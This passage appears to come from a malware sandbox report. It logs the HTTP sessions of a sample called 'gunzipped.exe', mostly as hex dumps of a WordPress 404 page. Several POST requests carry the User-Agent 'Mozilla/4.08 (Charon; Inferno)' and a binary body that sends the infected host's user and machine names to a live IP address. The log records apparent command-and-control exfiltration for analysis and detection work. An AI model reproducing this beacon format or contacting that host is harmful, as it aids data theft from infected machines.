27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:16:57.881400108 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:16:57.881409883 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:16:57.881419897 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:16:57.881434917 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:16:57.881445885 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:16:57.881458044 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:16:57.881469965 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:16:57.881483078 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:16:57.881496906 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.549710136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:16:58.235959053 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:16:58.440047979 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:16:59.342629910 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:16:58 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:16:59.342648029 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:16:59.342659950 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:16:59.342686892 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:16:59.342700005 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:16:59.342713118 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:16:59.342725992 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:16:59.342782021 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:16:59.342794895 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:16:59.342812061 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.549711136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:16:59.708946943 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:16:59.916275024 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:00.888947010 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:16:59 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 